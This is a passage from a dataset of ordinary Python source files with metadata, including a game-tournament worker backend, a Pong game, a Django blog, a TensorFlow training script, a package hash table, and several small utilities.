requests.get(MANAGER_URL+\"task\", params={\"apiKey\": API_KEY}).text\n\tif content == \"null\":\n\t\treturn None\n\telse:\n\t\treturn json.loads(content)\n\ndef getBotHash(userID):\n\t\"\"\"Gets the checksum of a user's bot's zipped source code\"\"\"\n\tresult = requests.get(MANAGER_URL+\"botHash\", params={\"apiKey\": API_KEY, \"userID\": userID})\n\tprint(result.text)\n\treturn json.loads(result.text).get(\"hash\")\n\ndef storeBotLocally(userID, storageDir):\n\t\"\"\"Downloads and store's a bot's zip file locally\n\tChecks the file's checksum to make sure the file was downloaded properly\n\t\"\"\"\n\titerations = 0\n\twhile iterations < 100:\n\t\tremoteZip = urllib.request.urlopen(MANAGER_URL+\"botFile?apiKey=\"+str(API_KEY)+\"&userID=\"+str(userID))\n\t\tzipFilename = remoteZip.headers.get('Content-disposition').split(\"filename\")[1]\n\t\tzipPath = os.path.join(storageDir, zipFilename)\n\t\tif os.path.exists(zipPath):\n\t\t\tos.remove(zipPath)\n\n\t\tremoteZipContents = remoteZip.read()\n\t\tremoteZip.close()\n\n\t\tlocalZip = open(zipPath, \"wb\")\n\t\tlocalZip.write(remoteZipContents)\n\t\tlocalZip.close()\n\n\t\tif md5(remoteZipContents).hexdigest() != getBotHash(userID):\n\t\t\titerations += 1\n\t\t\tcontinue\n\n\t\treturn zipPath\n\n\traise ValueError\n\ndef storeBotRemotely(userID, zipFilePath):\n\t\"\"\"Posts a bot file to the manager\"\"\"\n\tzipContents = open(zipFilePath, \"rb\").read()\n\titerations = 0\n\n\twhile iterations < 100:\n\t\tr = requests.post(MANAGER_URL+\"botFile\", data={\"apiKey\": API_KEY, \"userID\": str(userID)}, files={\"bot.zip\": zipContents})\n\n\t\t# Try again if local and remote hashes differ\n\t\tif md5(zipContents).hexdigest() != getBotHash(userID):\n\t\t\tprint(\"Hashes do not match! Redoing file upload.\")\n\t\t\titerations += 1\n\t\t\tcontinue\n\n\t\treturn\n\traise ValueError\n\ndef compileResult(userID, didCompile, language):\n\t\"\"\"Posts the result of a compilation task\"\"\"\n\tr = requests.post(MANAGER_URL+\"compile\", data={\"apiKey\": API_KEY, \"userID\": userID, \"didCompile\": int(didCompile), \"language\": language})\n\ndef gameResult(width, height, users, replayPath):\n\t\"\"\"Posts the result of a game task\"\"\"\n\tr = requests.post(MANAGER_URL+\"game\", data={\"apiKey\": API_KEY, \"mapWidth\": str(width), \"mapHeight\": str(height), \"users\": json.dumps(users)}, files={os.path.basename(replayPath): open(replayPath, \"rb\").read()})\n","sub_path":"worker/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"96220127","text":"#给出两个非空的链表用来表示两个非负的整数。\n# 其中,他们各自的位数是按照逆序的方式存储的,并且他们的节点只能存储一位数字。\n##如果,我们将两个数相加起来,则会返回一个新的链表来表示他们的和。\n#您可以假设除了数字0以外,这两个数都不会以0开头\nclass ListNode:\n def __init__(self,x):\n self.val=x\n self.next=None\nclass Solution:\n def addTwoNumbers(self,l1:ListNode,l2:ListNode)->ListNode:\n result1=\"\"\n while l1:\n result1=str(l1.val)+result1\n l1=l1.next\n \n result2=\"\"\n while l2:\n result2=str(l2.val)+result2\n l2=l2.next\n\n s=str(int(result1)+int(result2))\n return s","sub_path":"1906101045蓝昊杰/课后作业/第七次作业/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"87580535","text":"#!/usr/bin/env python3\n\nimport pickle\nimport operator\nimport os\nfrom pprint import pprint\n\nc_list = []\n\nfor f in os.listdir('.'):\n if not f.endswith('.pkl'):\n continue\n\n with open(f, 'rb') as fh:\n data = pickle.load(fh, encoding='utf-8')\n data = sorted(data.items(), key=operator.itemgetter(1), reverse=True)\n\n for i,k in enumerate(data):\n c_list.append(k)\n if i > 25:\n break\n\n\nw = set()\n\nfor item in c_list:\n if len(item[0].split()) > 1:\n print(item[0])\n","sub_path":"dir_pickle.py","file_name":"dir_pickle.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"370848736","text":"\nimport sys\n\nsys.path.append('/Users/choqueuse/Documents/codes/python/phasor_detection_TSP')\n\nimport numpy as np\nimport scipy as sc\nfrom numpy import linalg as lg\nfrom lib.triphase_detection import *\nfrom lib.comparison import *\nfrom lib.display import show_signals\nimport matplotlib.pyplot as plt\n\n\n\n#parameters\nloaded_parameter=np.load('parameters_npz.npz')\nFe=loaded_parameter['Fe'];\nf0=loaded_parameter['f0'];\nw_init=loaded_parameter['w_init'];\nN=80;\nSNR=loaded_parameter['SNR'];\nw=2*np.pi*f0/Fe\ncsv_on=1\nplot_on=1\n\ntype=\"balanced\"\n\nif type==\"balanced\":\n sym=np.matrix(np.array([0.0,0.0,1,1,0.0,0.0])).T\n filename_signal='../csv/sym_signal_balanced.csv'\n filename='../csv/sym_est_balanced.csv'\n\nif type==\"unbalanced\":\n sym=np.matrix(np.array([-0.5,0.2,1,1,-0.4,0.1])).T\n filename_signal='../csv/sym_signal_unbalanced.csv'\n filename='../csv/sym_est_unbalanced.csv'\n\n\n#Signal generation\nnum=(sym.T*sym)\nsigmaB=np.sqrt(np.trace(num/2)/(np.power(10,SNR/10.)))\nY=generate_Y_from_sym(sym,w,N,sigmaB)\n\nz_approx=compute_naive_sym_component(Y,w).A1\nz_est=estimate_sym_unbalanced(Y,w).A1\n\n\n#export csv file\nif csv_on==1:\n \n output_signal=np.bmat([sym.reshape((3, 2)),z_approx.reshape((3, 2)),z_est.reshape((3, 2))])\n np.savetxt(filename, output_signal,header=\"symx,symy,z_approxx,z_approxy,px,py\", delimiter=\",\")\n \n print(output_signal)\n output_signal=np.array([np.arange(0,N),np.arange(0,N)/Fe,Y[0,:].A1,Y[1,:].A1,Y[2,:].A1])\n np.savetxt(filename_signal, output_signal.T,header=\"n,t,Phase 1,Phase 2,Phase 3\", delimiter=\",\")\n\n\n\nif plot_on==1:\n show_signals(Y)\n plt.show()\n\n\n","sub_path":"python/simulation2.py","file_name":"simulation2.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"19755290","text":"import os\n\nfrom decouple import config\n\n\nclass Config():\n \"\"\"\n Base configuration\n \"\"\"\n DEBUG = config('DEBUG') == 'True'\n HOST = config('HOST')\n PORT = config('PORT')\n APP_DIR = os.path.abspath(os.path.dirname(__file__)) # This directory\n PROJECT_ROOT = os.path.abspath(os.path.join(APP_DIR, os.pardir))\n\n DB_TYPE = config('DB_TYPE')\n DB_HOST = config('DB_HOST')\n DB_NAME = config('DB_NAME')\n DB_USER = config('DB_USER')\n DB_PASS = config('DB_PASS')\n DB_PORT = config('DB_PORT')\n\n SUCCESS = 'SUCCESS'\n CREATED = 'CREATED'\n RESOURCE_ERROR = 'RESOURCE_ERROR'\n PARAMETERS_ERROR = 'PARAMETERS_ERROR'\n SYSTEM_ERROR = 'SYSTEM_ERROR'\n DATA_NOT_FOUND = 'DATA_NOT_FOUND'\n\n STATUS_CODES = {\n SUCCESS: 200,\n CREATED: 201,\n DATA_NOT_FOUND: 204,\n RESOURCE_ERROR: 404,\n PARAMETERS_ERROR: 400,\n SYSTEM_ERROR: 500,\n }\n\n HTTP_STATUS_CODES = {\n 100: 'Continue',\n 101: 'Switching Protocols',\n 102: 'Processing',\n 200: 'OK',\n 201: 'Created',\n 202: 'Accepted',\n 203: 'Non Authoritative Information',\n 204: 'No Content',\n 205: 'Reset Content',\n 206: 'Partial Content',\n 207: 'Multi Status',\n 226: 'IM Used', # see RFC 3229\n 300: 'Multiple Choices',\n 301: 'Moved Permanently',\n 302: 'Found',\n 303: 'See Other',\n 304: 'Not Modified',\n 305: 'Use Proxy',\n 307: 'Temporary Redirect',\n 400: 'Bad Request',\n 401: 'Unauthorized',\n 402: 'Payment Required', # unused\n 403: 'Forbidden',\n 404: 'Not Found',\n 405: 'Method Not Allowed',\n 406: 'Not Acceptable',\n 407: 'Proxy Authentication Required',\n 408: 'Request Timeout',\n 409: 'Conflict',\n 410: 'Gone',\n 411: 'Length Required',\n 412: 'Precondition Failed',\n 413: 'Request Entity Too Large',\n 414: 'Request URI Too Long',\n 415: 'Unsupported Media Type',\n 416: 'Requested Range Not Satisfiable',\n 417: 'Expectation Failed',\n 418: 'I\\'m a teapot', # see RFC 2324\n 422: 'Unprocessable Entity',\n 423: 'Locked',\n 424: 'Failed Dependency',\n 426: 'Upgrade Required',\n 428: 'Precondition Required', # see RFC 6585\n 429: 'Too Many Requests',\n 431: 'Request Header Fields Too Large',\n 449: 'Retry With', # proprietary MS extension\n 451: 'Unavailable For Legal Reasons',\n 500: 'Internal Server Error',\n 501: 'Not Implemented',\n 502: 'Bad Gateway',\n 503: 'Service Unavailable',\n 504: 'Gateway Timeout',\n 505: 'HTTP Version Not Supported',\n 507: 'Insufficient Storage',\n 510: 'Not Extended'\n }\n\n TAX_CODE = [\n (1, \"Food & Beverage\"),\n (2, \"Tobacco\"),\n (3, \"Entertainment\"),\n ]\n\n TAX_CODE_IS_REFUNDABLE = {\n 1: 'Yes',\n 2: 'No',\n 3: 'No'\n }\n\n LOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'console': {\n 'format': '[%(asctime)s][%(levelname)s] %(name)s '\n '%(filename)s:%(funcName)s:%(lineno)d | %(message)s',\n 'datefmt': '%H:%M:%S',\n },\n },\n 'handlers': {\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'console'\n },\n },\n 'loggers': {\n '': {\n 'handlers': ['console'],\n 'level': 'DEBUG',\n 'propagate': False,\n },\n 'your_app': {\n 'level': 'DEBUG',\n 'propagate': True,\n }\n }\n }\n\n @classmethod\n def serialize(cls, data):\n def structure_json(item):\n\n data_item = {\n \"id\": item[0],\n \"name\": item[1]\n }\n\n return data_item\n\n master = list(map(lambda item: structure_json(item), data))\n return master\n","sub_path":"config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"614182827","text":"# Importar modulos:\nimport pygame\nfrom pygame.locals import *\nimport os\nimport sys\nimport pygame._view\n\n# Definir variables globales (en mayusculas, por metodologia),\n# dimensiones de la pantalla y directorio de imagenes:\nSCREEN_WIDTH = 640\nSCREEN_HEIGHT = 480\n# Directorios (carpetas):\nIMG_DIR = \"imagenes\"\nSONIDO_DIR = \"sonidos\"\n# Contadores de puntuacion (se inician en cero):\nPUNTOSJUGADOR1 = 0\nPUNTOSJUGADOR2 = 0\n\n# Cargar imagenes:\ndef load_image(nombre, dir_imagen, alpha=False):\n ruta = os.path.join(dir_imagen, nombre)\n try:\n image = pygame.image.load(ruta)\n except:\n print (\"No se pudo cargar la imagen:\", ruta)\n sys.exit(1)\n if alpha == True:\n image = image.convert_alpha()\n else:\n image = image.convert()\n return image\n# Cargar sonidos:\ndef load_sound (nombre, dir_sonido):\n ruta = os.path.join(dir_sonido, nombre)\n try:\n sonido = pygame.mixer.Sound(ruta)\n except pygame.error:\n print (\"No se pudo cargar el sonido:\", ruta)\n sonido = None\n return sonido\n\t\n# Crear Sprites (una clase por cada sprite):\n# Creamos la pelota:\nclass Pelota(pygame.sprite.Sprite):\n def __init__(self, sonido_golpe, sonido_punto1, sonido_punto2):\n pygame.sprite.Sprite.__init__(self)\n self.image = load_image(\"bola.png\", IMG_DIR, alpha=True)\n self.rect = self.image.get_rect()\n\t# Centrar bola:\n self.rect.centerx = SCREEN_WIDTH / 2\n self.rect.centery = SCREEN_HEIGHT / 2\n\t# Velocidad de la bola:\n self.speed = [3, 3]\n # Crear los sonidos:\n self.sonido_golpe = sonido_golpe\n self.sonido_punto1 = sonido_punto1\n self.sonido_punto2 = sonido_punto2\n # Hace avanzar la pelota y que rebote en los extremos:\n def update(self):\n # Puntos de los jugadores:\n global PUNTOSJUGADOR1, PUNTOSJUGADOR2\n # La pelota ha alcanzado el borde de la pantalla?\n if self.rect.left < 0 or self.rect.right > SCREEN_WIDTH: \n self.speed[0] = -self.speed[0]\n # La pelota se movera en el sentido contrario al tocar un borde:\n if self.rect.top < 0 or self.rect.bottom > SCREEN_HEIGHT:\n self.speed[1] = -self.speed[1]\n # A que velocidad mueve la pelota:\n self.rect.move_ip(self.speed[0], self.speed[1])\n # Cuando se reproducen los sonidos y se cuentan los puntos:\n if self.rect.left < 0:\n self.sonido_punto2.play()\n PUNTOSJUGADOR2 = PUNTOSJUGADOR2 + 1\n if self.rect.right > 640:\n self.sonido_punto1.play()\n PUNTOSJUGADOR1 = PUNTOSJUGADOR1 + 1\n # Colisiones:\n def colision(self, objetivo):\n if self.rect.colliderect(objetivo.rect):\n self.speed[0] = -self.speed[0]\n self.sonido_golpe.play()\n# Creamos las Paletas:\nclass Paleta(pygame.sprite.Sprite):\n def __init__(self, x):\n pygame.sprite.Sprite.__init__(self)\n self.image = load_image (\"paleta.png\", IMG_DIR, alpha=True)\n self.rect = self.image.get_rect()\n self.rect.centerx = x\n self.rect.centery = SCREEN_HEIGHT / 2\n # Definimos al Jugador Humano:\n def humano(self):\n # Que la paleta no se salga de la pantalla:\n if self.rect.bottom >= SCREEN_HEIGHT:\n self.rect.bottom = SCREEN_HEIGHT\n elif self.rect.top <= 0:\n self.rect.top = 0\n # Definimos al Jugador CPU:\n def cpu(self, pelota):\n # La paleta se debe mover mas lento que la pelota (inferior a 3):\n self.speed = [0, 2]\n # La paleta solo se movera cuando la pelota cruce la mitad de la pantalla:\n if pelota.speed[0] >= 0 and pelota.rect.centerx >= SCREEN_WIDTH / 2:\n if self.rect.centery >= pelota.rect.centery:\n self.rect.centery -= self.speed[1]\n if self.rect.centery <= pelota.rect.centery:\n self.rect.centery += self.speed[1]\n\n# Jugador CPU invencible (sencillamente sigue el movimiento de la pelota):\n# def cpu(self, objetivo):\n# # Que la pala siga a la pelota:\n# self.rect.centery = objetivo.rect.centery\n# # Que la pala no se salga de la pantalla:\n# if self.rect.bottom >= SCREEN_HEIGHT:\n# self.rect.bottom = SCREEN_HEIGHT\n# elif self.rect.top <= 0:\n# self.rect.top = 0\n\n# Creamos el texto (para los puntos):\ndef render(texto):\n font = pygame.font.Font(\"lcd.ttf\", 40)\n texto_v= font.render(texto,1,(255,255,255))\n return texto_v\n\n# Definir la funcion principal del juego:\ndef main():\n # Iniciar modulo de Pygame:\n pygame.init()\n # Iniciar modulo del Mixer de Pygame (sonidos):\n pygame.mixer.init()\n # Iniciar modulo de Texto (puntos):\n pygame.font.init()\n \n # Dimensiones y nombre de la ventana:\n screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n pygame.display.set_caption(\"Oli Pong\")\n # Carga de elementos:\n fondo = load_image(\"fondo.jpg\", IMG_DIR, alpha=False)\n sonido_golpe = load_sound(\"coin.ogg\", SONIDO_DIR)\n sonido_punto1 = load_sound(\"aplausos.ogg\", SONIDO_DIR)\n sonido_punto2 = load_sound(\"losser.ogg\", SONIDO_DIR)\n bola = Pelota(sonido_golpe, sonido_punto1, sonido_punto2)\n \n # Crear y mostrar Jugador Humano (el numero es la separacion en pixeles de la pared):\n jugador1 = Paleta(40)\n # Crear y mostrar Jugador CPU:\n jugador2 = Paleta(SCREEN_WIDTH - 40)\n # Contador de tiempo:\n clock = pygame.time.Clock()\n # El movimiento se mantiene mientras se pulsa:\n pygame.key.set_repeat (1, 25)\n # Activar control con el raton sin puntero:\n pygame.mouse.set_visible(False)\n \t\n while True:\n\t# Frames por segundo maximos:\n clock.tick(60)\n\t# Registro de la posicion del raton:\n pos_mouse = pygame.mouse.get_pos()\n mov_mouse = pygame.mouse.get_rel()\n # Registro de elementos en movimiento:\n bola.update()\n jugador1.humano()\n jugador2.cpu(bola)\n # Comprobar si la pelota colisiona:\n bola.colision(jugador1)\n bola.colision(jugador2)\n\n # Bucle principal del juego:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n # Se comprueban las acciones del jugador:\n elif event.type == pygame.KEYDOWN:\n if event.key == K_UP:\n jugador1.rect.centery -= 6\n elif event.key == K_DOWN:\n jugador1.rect.centery += 5\n elif event.key == K_ESCAPE:\n sys.exit(0)\n # Revision cuando se sueltan las teclas:\n elif event.type == pygame.KEYUP:\n if event.key == K_UP:\n jugador1.rect.centery += 0\n elif event.key == K_DOWN:\n jugador1.rect.centery += 0\n # Cuanto se ha movido el raton desde la ultima consulta que hizo a get_rel:\n elif mov_mouse[1] != 0 :\n jugador1.rect.centery = pos_mouse[1]\n\n # Actualizar los cambios en pantalla:\n screen.blit(fondo, (0, 0))\n # Cargar todos los elementos de 1 vez:\n todos = pygame.sprite.RenderPlain(bola, jugador1, jugador2)\n todos.draw(screen)\n \n# Cargar elementos 1x1:\n# screen.blit(bola.image, bola.rect)\n# screen.blit(jugador1.image, jugador1.rect)\n# screen.blit(jugador2.image, jugador2.rect)\n\n # Actualizar los cambios de puntuacion en pantalla:\n screen.blit(render(str(PUNTOSJUGADOR1)), (10,10))\n screen.blit(render(str(PUNTOSJUGADOR2)), (610,10))\n\n pygame.display.flip()\n\nif __name__== \"__main__\":\n main()\n","sub_path":"Oli_Pong/Oli_Pong.py","file_name":"Oli_Pong.py","file_ext":"py","file_size_in_byte":7661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"413959542","text":"import pprint\nimport tensorflow as tf\nfrom model import MemN2N\nfrom data import *\n\npp = pprint.PrettyPrinter()\n\nflags = tf.compat.v1.app.flags\n\nflags.DEFINE_integer(\"edim\", 300, \"internal state dimension [300]\")\nflags.DEFINE_integer(\"lindim\", 300, \"linear part of the state [75]\")\nflags.DEFINE_integer(\"nhop\", 3, \"number of hops [3]\")\nflags.DEFINE_integer(\"batch_size\", 1, \"batch size to use during training [128]\")\nflags.DEFINE_integer(\"nepoch\", 300, \"number of epoch to use during training [100]\")\nflags.DEFINE_float(\"init_lr\", 0.01, \"initial learning rate [0.01]\")\nflags.DEFINE_float(\"init_hid\", 0.1, \"initial internal state value [0.1]\")\nflags.DEFINE_float(\"init_std\", 0.01, \"weight initialization std [0.05]\")\nflags.DEFINE_float(\"max_grad_norm\", 100, \"clip gradients to this norm [50]\")\nflags.DEFINE_string(\"checkpoint_dir\", \"checkpoints\", \"checkpoint directory [checkpoints]\")\nflags.DEFINE_string(\"pretrain_file\", \"baomoi.window2.vn.model.bin\", \"pre-trained [baomoi.window2.vn.model.bin]\")\nflags.DEFINE_string(\"train_data\", \"iphone_train.txt\", \"train gold data set path [.iphone_train.txt]\")\nflags.DEFINE_string(\"test_data\", \"iphone_test.txt\", \"test gold data set path [.iphone_train.txt]\")\nflags.DEFINE_boolean(\"show\", False, \"print progress [False]\")\n# flags.DEFINE_integer(\"pad_idx\", 0, \"pad_idx\")\n# flags.DEFINE_integer(\"nwords\", 1642, \"nwords\")\n# flags.DEFINE_integer(\"mem_size\", 134, \"mem_size\")\n\nFLAGS = flags.FLAGS\n\n\ndef main(_):\n source_word2idx, target_word2idx, word_set = {}, {}, {}\n max_sent_len = -1\n\n max_sent_len = get_dataset_resources(FLAGS.train_data, source_word2idx, target_word2idx, word_set, max_sent_len)\n max_sent_len = get_dataset_resources(FLAGS.test_data, source_word2idx, target_word2idx, word_set, max_sent_len)\n\n train_data = get_dataset(FLAGS.train_data, source_word2idx, target_word2idx)\n test_data = get_dataset(FLAGS.test_data, source_word2idx, target_word2idx)\n\n # FLAGS.pad_idx = source_word2idx['']\n # FLAGS.nwords = len(source_word2idx)\n # FLAGS.mem_size = max_sent_len\n\n pp.pprint(flags.FLAGS.__flags)\n\n print('loading pre-trained word vectors...')\n print('loading pre-trained word vectors for train and test data')\n\n pre_trained_context_wt, pre_trained_target_wt = get_embedding_matrix(source_word2idx, target_word2idx, FLAGS.edim)\n\n with tf.compat.v1.Session() as sess:\n model = MemN2N(FLAGS, sess, pre_trained_context_wt, pre_trained_target_wt, source_word2idx[''],\n len(source_word2idx), max_sent_len, target_word2idx)\n model.build_model()\n model.run(train_data, test_data)\n\n\nif __name__ == '__main__':\n tf.compat.v1.app.run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"262771289","text":"class HashMap:\n\n # This function is the constructor & creates an empty hashmap with # of buckets that parameter passes in : O(n)\n def __init__(self, buckets):\n self.hashmap = []\n for i in range(buckets):\n self.hashmap.append([])\n\n # This function creates the hash key needed for the hash table : O(1)\n # Returns hashkey\n def create_hashkey_from_id(self, key):\n hashkey = int(key) - 1\n return hashkey\n\n # This function inserts package values into the hash table using a key : O(1)\n def insert_into_hashtable(self, key, value):\n hash_key = self.create_hashkey_from_id(key)\n hash_pair = [hash_key, value]\n self.hashmap[hash_key] = hash_pair\n\n # This function deletes a value from the hash table : O(1)\n # Did not use for the project\n # Returns boolean\n def delete_from_hashtable(self, key):\n hash_key = self.create_hashkey_from_id(key)\n if self.hashmap[hash_key] == None:\n return False\n if self.hashmap[hash_key][0] == key:\n self.hashmap[hash_key].pop()\n return True\n\n # This function looks up buckets in the hash table // for the prompt(user) : O(n)\n # Prints package information for the user.\n def lookup_in_hashtable(self, packageid, single_package):\n hash_key = self.create_hashkey_from_id(packageid)\n found = False\n for bucket in self.hashmap:\n if bucket[0] == hash_key:\n found = True\n temp_package = bucket[1]\n if single_package:\n package_info = (f'Package #{temp_package.package_id} is {temp_package.delivery_status}. Delivery address is {temp_package.address} '\n f'{temp_package.city}, {temp_package.state} {temp_package.zip_code}. '\n f'Package weight is {temp_package.weight}. Delivery deadline is {temp_package.delivery_deadline}.'\n f' Delivered at {temp_package.delivery_time} AM.\\n')\n if not single_package:\n package_info = (\n f'Delivery address is {temp_package.address} '\n f'{temp_package.city}, {temp_package.state} {temp_package.zip_code}. '\n f'Package weight is {temp_package.weight}. Delivery deadline is {temp_package.delivery_deadline}.')\n if found:\n print(package_info)\n else:\n print(f'Package #{packageid} does not exist.\\n')\n\n # This function retrieves an object from the hash table : O(n)\n # Returns an object stored in the hash table\n def get(self, key):\n hash_key = self.create_hashkey_from_id(key)\n for pair in self.hashmap:\n if pair[0] == hash_key:\n return pair[1]\n return None\n","sub_path":"PackageHashTable.py","file_name":"PackageHashTable.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"490545780","text":"#settings.py\n\n\n\ndef init():\n global startByte, exitSleep, sleep, APIKey, header_SCYTEC, url_SCYTEC\n \n\n \n startByte=192 # 0b11000000\n exitSleep=1\n sleep=10\n \n ## ---- SCYTEC API PARAMETRES ---- ##\n APIKey='yKVy0lXmHRCgm0DZemSNtb0G0PZbjyj86Si8S7/HROdH7oPXMlJ1FaRbPGaT8mP3\\\n WaVfNOzqsNQxhF1F0hOtHQlGE0JH289w0bOFGLhoEj7IYBcQVgLl6hptez0C\\\n 08ALGA8hNACXyWj5J15lBMsKxIc4PfhfYnG5lCchUAdi397CBjv5it70Wtgg\\\n nHIPTNarNipJtEmitfT3Wl2libLQH30sbUU88l2I1Jmx6NFSAFPsFQ4z85uR\\\n qw=='\n \n header_SCYTEC={'Accept-Encoding':'gzip',\n 'Content-type':'application/json;charset=utf-8',\n 'APIKey':APIKey}\n \n url_SCYTEC='https://dx1.scytec.com/APIService/'","sub_path":"PythonScripts/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"575151189","text":"import re\nimport os\nimport codecs\n\nfrom setuptools import setup, find_packages\n\n\nrequirements =[\n \"future >= 0.15.0, < 1\",\n \"requests >= 2.5.2, < 3\",\n \"six >= 1.3.0, < 2\",\n \"websocket-client >= 0.32.0, < 1\",\n \"PyYAML >=3, < 4\",\n \"ago >=0.0.6, < 0.1\",\n \"python-dateutil >= 2, <3\",\n \"python-dockercloud >= 1.0.8, <2\",\n \"tabulate >= 0.7, <1\"\n]\n\n\ndef read(*parts):\n path = os.path.join(os.path.dirname(__file__), *parts)\n with codecs.open(path, encoding='utf-8') as fobj:\n return fobj.read()\n\n\ndef find_version(*file_paths):\n version_file = read(*file_paths)\n version_match = re.search(r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\",\n version_file, re.M)\n if version_match:\n return version_match.group(1)\n raise RuntimeError('Unable to find version string.')\n\nwith open('./test-requirements.txt') as test_reqs_txt:\n test_requirements = [line for line in test_reqs_txt]\n\nsetup(\n name='docker-cloud',\n version=find_version('dockercloudcli', '__init__.py'),\n packages=find_packages(),\n install_requires=requirements,\n tests_require=test_requirements,\n entry_points={\n 'console_scripts':\n ['docker-cloud = dockercloudcli.cli:main']\n },\n include_package_data=True,\n author='Docker, Inc.',\n author_email='info@docker.com',\n description='CLI for Docker Cloud',\n license='Apache v2',\n keywords='docker cloud cli',\n url='http://cloud.docker.com/',\n test_suite='tests',\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"455251323","text":"import io\nimport threading\n\n\ndef handler(conn, addr):\n message = conn.recv(1024)\n # print(message)\n conn.send(message)\n conn.close()\n\n\ndef server(host, port):\n listener = io.socket(io.AF_INET, io.SOCK_STREAM)\n listener.bind((host, port))\n listener.listen(10)\n print('server {} listen {}'.format(host, port))\n\n while True:\n conn, addr = listener.accept()\n # print(addr, 'connected')\n thread = threading.Thread(target=handler, args=(conn,addr))\n thread.start()\n\n\ndef main():\n host = '127.0.0.1'\n port = 8877\n server(host, port)\n\nif __name__ == '__main__':\n main()\n print('dsd')\n","sub_path":"server-multiThread.py","file_name":"server-multiThread.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"290379609","text":"from django.shortcuts import render_to_response\n\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.contrib.auth import login, authenticate, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.template import RequestContext\nfrom django.http import HttpResponse, HttpResponseRedirect\n\n\nfrom poster.models import Category\nfrom poster.models import Post\n\ndef one_post(request, idpost):\n post = Post.objects.get(id=idpost)\n \n return render_to_response(\n \"post.html\",\n {\n \"post\":post,\n },\n )\n\ndef home(request):\n posts = Post.objects.order_by(\"-creation_date\")\n \n return render_to_response(\n \"home.html\",\n {\n \"posts\":posts,\n },\n )\n\ndef posts_by_category(request, idcategory):\n category = Category.objects.get(id=idcategory)\n posts = category.post_set.order_by(\"-creation_date\")\n \n return render_to_response(\n \"home.html\",\n {\n \"posts\":posts,\n },\n )\n\ndef nuevo_usuario(request):\n\n if request.method=='POST':\n formulario = UserCreationForm(request.POST)\n if formulario.is_valid:\n formulario.save()\n return HttpResponseRedirect('/')\n else:\n formulario = UserCreationForm()\n return render_to_response('nuevousuario.html', {'formulario': formulario},\n context_instance=RequestContext(request))\n\ndef ingresar(request):\n if not request.user.is_anonymous():\n return HttpResponseRedirect('/privado')\n if request.method == 'POST':\n formulario = AuthenticationForm(request.POST)\n if formulario.is_valid:\n usuario = request.POST['username']\n clave = request.POST['password']\n acceso = authenticate(username=usuario, password=clave)\n if acceso is not None:\n if acceso.is_active:\n login(request, acceso)\n return HttpResponseRedirect('/privado')\n else:\n return render_to_response('noactivo.html', context_instance=RequestContext(request))\n else:\n return render_to_response('nousuario.html', context_instance=RequestContext(request))\n else:\n formulario = AuthenticationForm()\n return render_to_response('ingresar.html',{'formulario':formulario}, context_instance=RequestContext(request))\n\n@login_required(login_url='/ingresar')\ndef privado(request):\n usuario = request.user\n return render_to_response('privado.html', {'usuario':usuario}, context_instance=RequestContext(request))\n\n@login_required(login_url='/ingresar')\ndef cerrar(request):\n logout(request)\n return HttpResponseRedirect('/')","sub_path":"poster/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"68849510","text":"import jinja2\nfrom werkzeug.wrappers import Request, Response\n\n\ndef render(template_path, context):\n if template_path.endswith('/'):\n template_path += 'index.html'\n\n return jinja2.Environment(\n loader=jinja2.FileSystemLoader('html/')\n ).get_template(template_path).render(context)\n\n\n@Request.application\ndef application(request):\n context = {\n 'get_data': request.args,\n 'post_data': request.data,\n }\n return Response(render(request.path, context), mimetype='text/html')\n\nif __name__ == '__main__':\n from werkzeug.serving import run_simple\n run_simple('localhost', 8080, application)\n","sub_path":"local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"461088222","text":"import flask\nimport redis\nimport collections\nimport json\nimport numpy as np\n\napp = flask.Flask(__name__)\nconn = redis.Redis()\n\ndef buildHistogram():\n keys = conn.keys() # gets keys [timestamps] from redis\n values = conn.mget(keys) # gets the values for each time stamp\n c = collections.Counter(values) # builds a histogram\n z = sum(c.values())\n return {k:v/float(z) for k,v in c.items()}\n\n@app.route(\"/\")\ndef histogram():\n h = buildHistogram()\n return json.dumps(h)\n\n@app.route(\"/entropy\")\ndef entropy():\n h = buildHistogram()\n return -sum([p*np.log(p) for p in 